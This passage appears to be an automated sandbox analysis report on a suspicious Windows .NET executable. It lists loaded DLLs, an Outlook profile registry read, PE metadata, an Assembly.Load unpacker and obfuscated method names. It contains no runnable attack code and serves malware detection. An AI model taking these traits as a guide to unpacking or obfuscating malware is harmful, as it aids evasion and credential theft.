                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: HQYI.pdbSHA256 source: 299371485_14108825808_1736351479899.exe
                    Source: Binary string: HQYI.pdb source: 299371485_14108825808_1736351479899.exe

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.cs.Net Code: tMj9M9Iyv6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.cs.Net Code: tMj9M9Iyv6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4ee0000.5.raw.unpack, MainForm.cs.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.299371485_14108825808_1736351479899.exe.37a99c8.2.raw.unpack, MainForm.cs.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.299371485_14108825808_1736351479899.exe.4279ea8.3.raw.unpack, zuDh9WIx1svT8dxSDC.cs.Net Code: tMj9M9Iyv6 System.Reflection.Assembly.Load(byte[])
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: 0xFBDE30D5 [Tue Nov 27 21:38:29 2103 UTC]
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 0_2_0272F210 push esi; retn 0004h0_2_0272F21A
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 0_2_0272F21F push edi; retn 0004h0_2_0272F22A
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 0_2_0272F188 push ebx; retn 0004h0_2_0272F1A2
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 0_2_0D751B1F push esp; retn 5504h0_2_0D751B96
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_06F0840C push es; retf F080h6_2_06F08440
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_06F01580 push es; iretd 6_2_06F01604
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_06F0C1BF push es; ret 6_2_06F0C1C0
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 6_2_06F088DF push es; ret 6_2_06F088E0
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: section name: .text entropy: 7.7464499069030195
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, qelLwRPCPsGUs6jdyY.csHigh entropy of concatenated method names: 'C4JlbnANLt', 'NEvl8YuQcg', 'NN6lCuaIGq', 'MBClKTQfSr', 'heTlBYamwi', 'CwvlISDKoB', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, ggXPZ5pdN41pIJs1V3.csHigh entropy of concatenated method names: 'ilnCo2TpYw', 'jQKCNctpwn', 'g3fCdhQ4Js', 'ToString', 'uj3C4FpJJS', 'SZ2C58A6MS', 'b5LeipymTSahZpCWtVI', 'a1NBaSy4kxFCjHZl6ot', 'qFDxGAyJuBOXAU3uP6S', 'bQbx4HyXSVlTNcxgB9W'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, KiBPZRUmpULxGIDG71.csHigh entropy of concatenated method names: 'vTOKf63TLf', 'Ck4K6KTSyh', 'mpoKMCphDT', 'QUvKvcuiCl', 'sWqKJLKTUR', 'AVkKEThFF6', 'qKhKO19hPd', 'PliKy3LrZg', 'DbjK2KXapj', 'UptKToYVXa'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, vbF4dwbDYXd1pm0UND.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ARs7Zueo2T', 'fg37PlI7bQ', 'L3e7zbBF6O', 'tWGFrMcMJh', 'HfDFjU0QJp', 'OWqF7ccZXX', 'yYaFF3xJ4A', 'KQhgDkf0myA5Z1vVEcy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Ad8t06TsdlZPlGJflu.csHigh entropy of concatenated method names: 'WUa8J9DTew', 'wye8OiWCKY', 'NGlbSsUNHx', 'gWlbuiODZG', 'CyHbXdruHc', 'Gfkbp0H53H', 'NTYbW5uH0F', 'zAhbmigu3E', 'JTvbUr7yE6', 'f39biBHtB9'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, nJfbfko7qhviuIACOm.csHigh entropy of concatenated method names: 'ToString', 'nUvQ0x5mpP', 'yo1QcUWHr2', 'hI2QSgYY72', 'XCdQu7q9R5', 'crEQXSZicJ', 'A2eQpoBqck', 'GK2QW1LDF5', 'dHBQmj1QsF', 'veDQUTGIxR'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Ru23Huyb8mQLjC7BwH.csHigh entropy of concatenated method names: 'qKNqtcoNRU', 'tMRqh655Hk', 'cydqohwEm1', 'lRmqNULURh', 'YdiqdpFKUc', 'YtEq4FoWAb', 'HCMq52QiOf', 'uP5qatB1SB', 'VRjqZoTOF2', 'EtZqPV98Aq'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, zuDh9WIx1svT8dxSDC.csHigh entropy of concatenated method names: 'nNWF1G7MHU', 'yIKFGqwVsM', 'gJUFqwRMVG', 'SoqFbPyRkr', 'dIhF8RGr9t', 'mmlFCbEW2s', 'kfSFK0ejw5', 'xjaFI39hgS', 'iPqFwPHaio', 'nLsFns5SaE'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, UQ2KwGjrcRdMFjeybgG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qqCl0TGnC8', 'QRblDiKoFe', 'YrClL35cag', 'o4xltb0hSF', 'uJ1lhHiIN9', 'JcyloCa4T2', 'lK8lNLhq2E'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, NvlJnjtLs8bdgXBD99.csHigh entropy of concatenated method names: 'CUDeimJgTS', 'qh4eD0ZMSv', 'uAoet9Dgbd', 'KUMehq5Pgl', 'b1GecRRf2P', 'cIAeSuTxAi', 'GdEeuXwLNU', 'qHBeXjJMf9', 'cKcepgQvyC', 'VeDeWRNpAd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, vFBqrTW7LF9gFQ3SS9.csHigh entropy of concatenated method names: 'YusKGfnxTw', 'mFNKbjNWGJ', 'v0kKCBJvHc', 'kTBCPS9JUJ', 'naUCziBAwT', 'AhEKr6FPyy', 'UJ9KjNWpGN', 'uaUK7eDKgu', 'jZxKFcfu0H', 'oiKK9Fo6dd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, w4aIYZZAxAL81mU4Pf.csHigh entropy of concatenated method names: 'tbsBYQAIjb', 'Qj8BcmckrZ', 'ci1BSALIuO', 'vq8BuU9VUD', 'iQWBXj6b9E', 'wigBpJdmud', 'xDwBWsIw0b', 'gveBmn9kue', 'F76BU0DIOI', 'GF1Bi71EUZ'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, I7L8C6N1ebf5t9UBNB.csHigh entropy of concatenated method names: 'GhwAnyibkG', 'qKtAsiCy08', 'ToString', 'Q4JAGOYMHa', 'ydLAqEDiSj', 'V73Ab35N3p', 'tiYA8kcdEJ', 'KWeACNh0Vu', 'NZpAK75mWm', 'i0OAIG4CMK'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, qFpaCg4OeA9gyeZYvB.csHigh entropy of concatenated method names: 'cRMAa0XpJN', 'FimAPvP2jr', 'FEnxroRaLi', 'D1YxjmDc24', 'D1IA0jrwGL', 'kggADFGiWg', 'PHEALmoOf0', 'HYFAtRYgdn', 'NOCAhQxFUg', 'NT7Aok0MCh'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, XEbj01c6HjltfqTAYO.csHigh entropy of concatenated method names: 'R6HG07yaTT7p1wrHxiQ', 'jWnbt4yFKwV4f4O8La3', 'Lb4CxmI65B', 'dS1CBVcFBL', 'fCYClqspom', 'k91DwNyYu1JU3W8CJkA', 'enG5bAyRxepn5Q9TkCu'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, a6ErcFYOWqRCf0yytN.csHigh entropy of concatenated method names: 'qd2C1YF2aN', 'CHsCqUSZab', 'YBpC8bDBWf', 'IT6CKBNg4O', 'l0nCIjIysJ', 'WOk8dqRp0M', 'fwx84ULr0r', 'Ryy85rxqRc', 'X8I8aXN9dA', 'eNA8ZJh3yl'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, VTwGxuj9BXOw3aUhmTr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kdVVB6UQ1d', 'xNmVlKFttY', 'f95VgPgmlT', 'yCXVV9C06G', 'f6jV3nqVgZ', 'jKMVHAUR3I', 'FvUVR1pUNb'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Xps7qRzTcm6j2O5EgP.csHigh entropy of concatenated method names: 'fbFlEUaWEi', 'm87lydFlV7', 'dPbl2cJ0k6', 'vMolY90eWD', 'b58lcEeXVy', 'z0FluM8CNn', 'bE3lXil51Y', 'borlRHJdHa', 'gySlf1nh3m', 'r1Vl6mHovj'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, GmQF5c96kjSSXmTedq.csHigh entropy of concatenated method names: 'v0tjKu23Hu', 'g8mjIQLjC7', 'NkhjnIBVLA', 'i5ejsCvd8t', 'fJfjelur6E', 'acFjQOWqRC', 'wjMxeVddQy3O8n4b3E', 'i9JQ60n6NPoaj2Jir7', 'O6bjjELi8v', 'K1OjFPPdsk'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, nrtLcTjjDPGqy3J5J8r.csHigh entropy of concatenated method names: 'zSclPJQaLc', 'LnKlznPo8e', 'y5pgrn35kf', 'stNgjlSHee', 'W59g79iVOf', 'TjVgFqUOmi', 'qqDg9UkcZ1', 'eU9g1kJFbd', 'hFrgG8xD90', 'fmwgqL9dx5'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, VushkvqOit4FjNAy9I.csHigh entropy of concatenated method names: 'Dispose', 'EuIjZeQ4LD', 'FyC7codZQ0', 'hFlOXJLFwU', 'VFyjPGK9yc', 'pqVjzNt61m', 'ProcessDialogKey', 'rMH7r4aIYZ', 'qxA7jL81mU', 'VPf77AelLw'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, Xhifmp5Im2uIeQ4LD5.csHigh entropy of concatenated method names: 'VLhBeDH9r4', 'PpyBAd6Ll1', 'LFEBBnyoGc', 'EECBg9iGtG', 'LxtB3R6WMg', 'REgBRqM5SU', 'Dispose', 'UwOxGpbd10', 'rg3xqEOBwh', 'BS8xbboLWy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, ruDEOU2khIBVLAC5eC.csHigh entropy of concatenated method names: 'KZ8bvO40Wr', 'sQEbEXJDhl', 'ffqbyfoUww', 'eKDb2Q4MtS', 'O2FbebY4uW', 'wxdbQHmMpS', 'zOBbAUQdbj', 'BbIbx5nb5X', 'lbMbBl5DUD', 'ot8bllxglN'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, cbbtMY7GD7d1iUYhAX.csHigh entropy of concatenated method names: 'q5GMGslJM', 'EQyvUl5iu', 'CoDE5XOKS', 'b1COhJQJH', 'naI2m2o8C', 'A1hTPLsN0', 'NETVDVLfcWVTSqcl8g', 'nfmL13G8xZw2qfad3n', 'V6TxipDOr', 'oR1lhV4Dv'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.9b20000.6.raw.unpack, UIgDiRLwSiBdvbIDpp.csHigh entropy of concatenated method names: 'lrPky6NOEY', 'nYvk27DFfA', 'fxnkY9KjQu', 'eYYkcs2k12', 'fEAkuyg4Ey', 'exnkXUy3PT', 'J97kWEtmIx', 'nWtkmoj9mT', 't9mkic3TWQ', 'FVdk0RySk6'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, qelLwRPCPsGUs6jdyY.csHigh entropy of concatenated method names: 'C4JlbnANLt', 'NEvl8YuQcg', 'NN6lCuaIGq', 'MBClKTQfSr', 'heTlBYamwi', 'CwvlISDKoB', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, ggXPZ5pdN41pIJs1V3.csHigh entropy of concatenated method names: 'ilnCo2TpYw', 'jQKCNctpwn', 'g3fCdhQ4Js', 'ToString', 'uj3C4FpJJS', 'SZ2C58A6MS', 'b5LeipymTSahZpCWtVI', 'a1NBaSy4kxFCjHZl6ot', 'qFDxGAyJuBOXAU3uP6S', 'bQbx4HyXSVlTNcxgB9W'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, KiBPZRUmpULxGIDG71.csHigh entropy of concatenated method names: 'vTOKf63TLf', 'Ck4K6KTSyh', 'mpoKMCphDT', 'QUvKvcuiCl', 'sWqKJLKTUR', 'AVkKEThFF6', 'qKhKO19hPd', 'PliKy3LrZg', 'DbjK2KXapj', 'UptKToYVXa'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, vbF4dwbDYXd1pm0UND.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'ARs7Zueo2T', 'fg37PlI7bQ', 'L3e7zbBF6O', 'tWGFrMcMJh', 'HfDFjU0QJp', 'OWqF7ccZXX', 'yYaFF3xJ4A', 'KQhgDkf0myA5Z1vVEcy'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Ad8t06TsdlZPlGJflu.csHigh entropy of concatenated method names: 'WUa8J9DTew', 'wye8OiWCKY', 'NGlbSsUNHx', 'gWlbuiODZG', 'CyHbXdruHc', 'Gfkbp0H53H', 'NTYbW5uH0F', 'zAhbmigu3E', 'JTvbUr7yE6', 'f39biBHtB9'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, nJfbfko7qhviuIACOm.csHigh entropy of concatenated method names: 'ToString', 'nUvQ0x5mpP', 'yo1QcUWHr2', 'hI2QSgYY72', 'XCdQu7q9R5', 'crEQXSZicJ', 'A2eQpoBqck', 'GK2QW1LDF5', 'dHBQmj1QsF', 'veDQUTGIxR'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, Ru23Huyb8mQLjC7BwH.csHigh entropy of concatenated method names: 'qKNqtcoNRU', 'tMRqh655Hk', 'cydqohwEm1', 'lRmqNULURh', 'YdiqdpFKUc', 'YtEq4FoWAb', 'HCMq52QiOf', 'uP5qatB1SB', 'VRjqZoTOF2', 'EtZqPV98Aq'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, zuDh9WIx1svT8dxSDC.csHigh entropy of concatenated method names: 'nNWF1G7MHU', 'yIKFGqwVsM', 'gJUFqwRMVG', 'SoqFbPyRkr', 'dIhF8RGr9t', 'mmlFCbEW2s', 'kfSFK0ejw5', 'xjaFI39hgS', 'iPqFwPHaio', 'nLsFns5SaE'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, UQ2KwGjrcRdMFjeybgG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'qqCl0TGnC8', 'QRblDiKoFe', 'YrClL35cag', 'o4xltb0hSF', 'uJ1lhHiIN9', 'JcyloCa4T2', 'lK8lNLhq2E'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, NvlJnjtLs8bdgXBD99.csHigh entropy of concatenated method names: 'CUDeimJgTS', 'qh4eD0ZMSv', 'uAoet9Dgbd', 'KUMehq5Pgl', 'b1GecRRf2P', 'cIAeSuTxAi', 'GdEeuXwLNU', 'qHBeXjJMf9', 'cKcepgQvyC', 'VeDeWRNpAd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, vFBqrTW7LF9gFQ3SS9.csHigh entropy of concatenated method names: 'YusKGfnxTw', 'mFNKbjNWGJ', 'v0kKCBJvHc', 'kTBCPS9JUJ', 'naUCziBAwT', 'AhEKr6FPyy', 'UJ9KjNWpGN', 'uaUK7eDKgu', 'jZxKFcfu0H', 'oiKK9Fo6dd'
                    Source: 0.2.299371485_14108825808_1736351479899.exe.41f3088.1.raw.unpack, w4aIYZZAxAL81mU4Pf.csHigh entropy of concatenated method names: 'tbsBYQAIjb', 'Qj8BcmckrZ', 'ci1BSALIuO', 'vq8BuU9VUD', 'iQWBXj6b9E', 'wigBpJdmud', 'xDwBWsIw0b', 'gveBmn9kue', 'F76BU0DIOI', 'GF1Bi71EUZ'
